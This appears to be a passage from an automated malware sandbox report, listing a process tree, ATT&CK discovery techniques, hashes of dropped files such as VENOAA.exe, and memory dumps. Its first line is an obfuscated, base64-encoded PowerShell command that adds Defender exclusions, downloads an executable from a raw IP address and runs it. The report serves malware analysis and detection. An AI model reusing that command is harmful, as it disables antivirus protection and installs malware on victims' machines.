        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGYAZABtACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAYQBkAGoAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAeQB6AHMAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAcgBlAGgAIwA+ADsAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcAA6AC8ALwA5ADMALgAxADIAMwAuADgANQAuADEAMAA4AC8AVgBFAE4ATwBBAEEALgBlAHgAZQAnACwAIAA8ACMAYgBlAHIAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgADwAIwBwAGMAdwAjAD4AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAVABlAG0AcAAgADwAIwBwAGQAcQAjAD4AIAAtAEMAaABpAGwAZABQAGEAdABoACAAJwBWAEUATgBPAEEAQQAuAGUAeABlACcAKQApADwAIwB2AGEAcQAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBoAG4AZAAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAaABwAGUAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAVgBFAE4ATwBBAEEALgBlAHgAZQAnACkAPAAjAG4AaQBiACMAPgA="
        316⤵
        
        PID:2824

C:\Windows\system32\backgroundTaskHost.exe
"C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
1⤵
PID:5028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\VENOAA.exe.log

Filesize
226B

MD5
28d7fcc2b910da5e67ebb99451a5f598

SHA1
a5bf77a53eda1208f4f37d09d82da0b9915a6747

SHA256
2391511d0a66ed9f84ae54254f51c09e43be01ad685db80da3201ec880abd49c

SHA512
2d8eb65cbf04ca506f4ef3b9ae13ccf05ebefab702269ba70ffd1ce9e6c615db0a3ee3ac0e81a06f546fc3250b7b76155dd51241c41b507a441b658c8e761df6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
556084f2c6d459c116a69d6fedcc4105

SHA1
633e89b9a1e77942d822d14de6708430a3944dbc

SHA256
88cc4f40f0eb08ff5c487d6db341b046cc63b22534980aca66a9f8480692f3a8

SHA512
0f6557027b098e45556af93e0be1db9a49c6416dc4afcff2cc2135a8a1ad4f1cf7185541ddbe6c768aefaf2c1a8e52d5282a538d15822d19932f22316edd283e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
d04b53499c74a80d0cf2ed11c7451311

SHA1
b57316c01be342c037bffa2cb1694744926046ef

SHA256
6bfb4ea07601f7ef7e71a3436ce3864ae22d07a0846908895429828fce62a2ac

SHA512
55128cd4e976da060566ab6bb5ad5c5e75cd22dd89a627494a57cf4be5d96714cce10c8faf88bef9eb871fc19eab81a67ba825c2263e7ab904bbac59ada9a57c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
bb893aabbd8526da0db3af299d48fe89

SHA1
3303779de78e78ee05a1677644f3749f59771897

SHA256
452137f229ca12f3c62435e3fbc286ea148e52be271cc896fe3ca78184ff1642

SHA512
1c30c41a8f0fca227667da207ed028119cdaa4b8563555518438c9172e9dc3f03848831c46ea4120666113f84b5ac92e43d52b833939d8f053a2a415023c187d

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
9916f10ea430ec3818c6e561c9bec3b1

SHA1
0cf3a0373fe71549c32b711e614cffd7971849be

SHA256
a9ba6bc27a2f74876f0009746ed8f22ca8b9135907278264125adb6af9860118

SHA512
8824d4e9ec712e9782f5762a1a832b35e8c11f8cf93b9379c25d90af6a6df4aa772606bdf0c1e3a656b1f18023e851a7ece3b1cb6ad4f0b6c25e6ff1d9c23b79

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
dd2c8a525ecd4913a2b65e66e858e597

SHA1
4531c6ddbd2863a5d32c4967d63c9a02e0a92bde

SHA256
260b047ec7ccc31117a3c12a142c4a3a814a49135f5a227c04153e90b950d44c

SHA512
e71015ba40b537225714e1d011a91c439d7c13d8c94a48ccc22d74f092be834a6b078d76ac7bc9865a4009d805e2b5a0f4d299eb728eb12c5767d9798ddd49e3

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
1b4dcc8655d3bd0ffc7a21c34cae75cc

SHA1
86d0d3e9192ad30b9a54c2070c658b74f2a02279

SHA256
ccf250fd0065891bb803114e5d9803a9e72b168da60484333840ba060782d8d9

SHA512
703cfc31ae5fe7749c19963b6065d834285e57e0546034f00d01db8bb0a10bfc7918ee83ca66375a79309989fefe8ab774caa1e93ea4b43387456b85a9da0624

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
90a6ccf7d729d2c498c33bf6bfd011d8

SHA1
10eb873399cd0b7b69164de62693273fbfe5c68c

SHA256
3bf256f83d828b9481853b2ad33b443bb804740cae10af91ce9def7b3b082638

SHA512
c44bdcaa7a582ee7485a0e2f8612bf2f405cc6cdc0eba5365389fe237f5c2c0635f8eb96c16092be275bd530125fe50015ef99d76c8f1859a0c1f7ade191f956

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
4ec38392a284b06d7682a2616d0d647b

SHA1
d4be1c03e35a6e523c3a1c36aee7ae1c389a2d28

SHA256
f6860f53ccb95980a28eb2b3e2cb699de89fa4351907bd71dc3e611dad02e3f1

SHA512
8966c5e71fbabb2657a3ca2b2ed4847b33b1789450dc4ba19ae1eb0c0e14e32012cf44b312a85c114bdbc95d5a4419f549c45c6a0d9dbb884bbea6ab91bbe5ba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
b4c9177ae28cc536712eedb635c7013c

SHA1
2cfc8f644ec0b6c80cdc59ad4b02d58718c5efc8

SHA256
bcb1f20fd6d2268177fa894cd0dbf915a9e4e8960476f578e249ab96ed58f7ea

SHA512
46801ca95f43204b5346f4735eaabe3faa8724df41ef19ef33f92c9d66372021432278af4a962c15769e9e1b6322d12a85e9ba6edefbb4e965e3508350143312

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8de045c6599f1ef051dbda7a2b92fdb5

SHA1
8562e344a34e03408ac81a247b60b864d2f37cc6

SHA256
408732c926edec46a6b52939463415d63a6198dc66eda18bb76321821feaa89b

SHA512
3107c9efa3f55a709bdb00ece5befe7f2f5543eca6557ab09f75f0d76bb2757a49de44fac86f74b807881aa7cb15d3b148cda852a573a998de1e3ddc568074a1

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
6407661c6ea7343e7bfaac941e9cfd4f

SHA1
3bd864e1c94d425a6d7619656913e19833a5fb9f

SHA256
2b1340d535b8e568cdbd1cfae05cf6aa065ed9c6a53e3b5769f312fac183c2ef

SHA512
e0040da4f4b63b0017a3c231d594ac0838d725ad319b89152d1c1f13486bf6e41175615a4643fb67b4c1a95dcd6b87d2cc23b9c863fc59fc9f2155cc5af1330c

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
79582863ca97a6077007f67d31eb5ba6

SHA1
880a1bd2e6bb54446479d30b7660889a198aafeb

SHA256
565c0a43a2928ec8371a53ee3feb7c102ce80da203e6cd3c5e0e184b97e57360

SHA512
fc55f44d8325b378c192bbc42f742076e99a5ef1f3141de70494ef8da82b055f29ce0b92d245dd3d7859ca709dfe912788f474a155bd4f8e53ddfd02675e8cc4

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
3729bc022d140bc5c6b684d07487393c

SHA1
345f638ebf35cea7a48003bad5ec065954ae3ab2

SHA256
b916626ad0ac944a050ac06336da2867e1ded27224a5c7fcfdc337a447e9bc8b

SHA512
498dbc3e860f18f178b8c4786b4a3b3246c6044af0e34c556b2e758d666c741359843acbc932eb7225657fab8071798bdd332801e04f8d520bae95d4ce3df148

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
96576e728314c8893dc4dbeb84784d3d

SHA1
708af828a131d8e1ddc657e3a6fecb42d7e26005

SHA256
0eb090ad4fe8bb0fee04122383fb5b560d129bcfbb62ccfcc03ac2c37f6ea942

SHA512
a71bc3cce4c961338816a8ba3fd3d0c6108f4da9b1539fc4943fbee150099819482f914665861a38d3d04b4998a9f8513116dc9f505d1ab825be1a707a4ea2d5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
25ddfc8526f17e7e479745b84fa2135e

SHA1
48d32b670900e5b12433e3e70365ab708143200b

SHA256
55839927a74f573d51f03d13f6b157356831ca40c07a0b746a1106cb28fced08

SHA512
818d6ff96e28b1aa39422d16e6486e2f11dd847bb91e1b4dbcbab2e732944da4c3aa02e1497621932cc22a46c8266bb4a52966e024148925ca1c4a7858104e56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
604e374139220e92f2d61f1f4ccc4faa

SHA1
cac964ebe0531e728d88081e5a0efc54c4419963

SHA256
b23269353682daf6909a1e390e7ecb03540600e99b3193dea9da8e0d9c9e62aa

SHA512
1055e32d39cf72ca76f66e826812946e6eaaeb535025f9b67a1a7d74fcc1244f046b2240eb2b994c5ddca7edf880ab1a88d5b60dec24a6536d959b1d96774835

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7c893ca48ff42340ddf826c03792324c

SHA1
cfde28f4b315960e9ee7286b41d87123e9c6317d

SHA256
7077ae935368823bb5544fdbb55e90b5170f4111e046a2444a056b420b863ac5

SHA512
6dcd71969230fca53386ccbff2e1551bcb1935a262420eb5c385a4c11fa40fd168e0db69cb09afcf5470d4cf8505f0f464baefcdf2669564756c826ddde38d56

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
f90fb7af407c4881f03fcea8d27fe3f5

SHA1
2b23bd8bba51142a1b2e0c1d4400034f602bd195

SHA256
bab7e9643b17615dbd9eb6d1981977ef475078ef8aa63a44c8f46ce5409e3e83

SHA512
9e85a1bee1449f2bd92a8dc33f03cd2877d0da8ca21abd3444ea71daeb81ef245134d17d6e26b9168de39f6b47056cbed8186ec2cbb9413f9ee40a574fdef810

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
8ec82ec6c7d1968938c6fcdbbc99ae3e

SHA1
f643f5ba0036e50b122b2a35fd685aaac3da99ee

SHA256
12d1759ef11786667a91d106cd9a6a865fa732b6f25504089a6613628e3e9bbc

SHA512
a0cd1c5d64b8033247c5b93af96b3d8b33a96c6a9d90ffb983c0e4d715634b8b987500f44e9fdb054f6b94308ce78b815c7f16828be5da17cf5aecf963bd1f2b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
adfe1fbc5c32eba5d697191e075aea74

SHA1
f86ec9834d89b7cd416b671850329c9c3bb6254f

SHA256
2bfe4dee292b67154c8ce1a3ce76e45beadeb2e3d5bd3239e164772628048095

SHA512
6d11fa5ab2ea6dd309f93c6c0f883fbd565180627d1c298a36d08b32d19820e4acca065c79ede22b555bf995257132df2bd4829d4e450087cc685cde207e482b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
ac604ea8cff30a990ca856b509ea4ed4

SHA1
27dc0de783b1565d808a1b4c44d4a9996fae475b

SHA256
81231888cbaaee7e712a3410074d22c0b45883f0218272c2d919c131fee7ffa0

SHA512
3f4d041658b66f783b57e5b20e7541105d13bc3139d81bc516cfe0f81bfa908a7b87266dddd857c5b634862fac9bfadb4555908da9f8b04147fa7910c95bbcc6

Download Submit
C:\Users\Admin\AppData\Local\Temp\VENOAA.exe

Filesize
6KB

MD5
a79bbca37e4d87e9bd35a6d4f4730250

SHA1
38e7ddeb8f9e7fe8f56a9a43b012d6d5318f7e48

SHA256
3fcf13982c7b543af58f22f18d77b370f2871eec5f8be3838588189ec528afad

SHA512
fac3c4afeed70e78e3162576716c1055616353e109fcbdc06200239dc4c7d28762ef0ee40dac1d2faa1394903f36209c6f49e12a73533d7b733433401d01ab64

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hqgvuxw.eib.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/716-13-0x00007FFF756B0000-0x00007FFF76171000-memory.dmp

Filesize
10.8MB

Download
memory/716-14-0x00007FFF756B0000-0x00007FFF76171000-memory.dmp

Filesize
10.8MB

Download
memory/716-15-0x00007FFF756B0000-0x00007FFF76171000-memory.dmp

Filesize
10.8MB

Download
memory/716-16-0x00007FFF756B0000-0x00007FFF76171000-memory.dmp

Filesize
10.8MB

Download
memory/716-3-0x000001BFA90C0000-0x000001BFA90E2000-memory.dmp

Filesize
136KB

Download
memory/716-30-0x00007FFF756B0000-0x00007FFF76171000-memory.dmp

Filesize
10.8MB

Download
memory/4588-0-0x0000000000DA0000-0x0000000000DA8000-memory.dmp

Filesize
32KB

Download
memory/4588-1-0x00007FFF756B3000-0x00007FFF756B5000-memory.dmp

Filesize
8KB

Download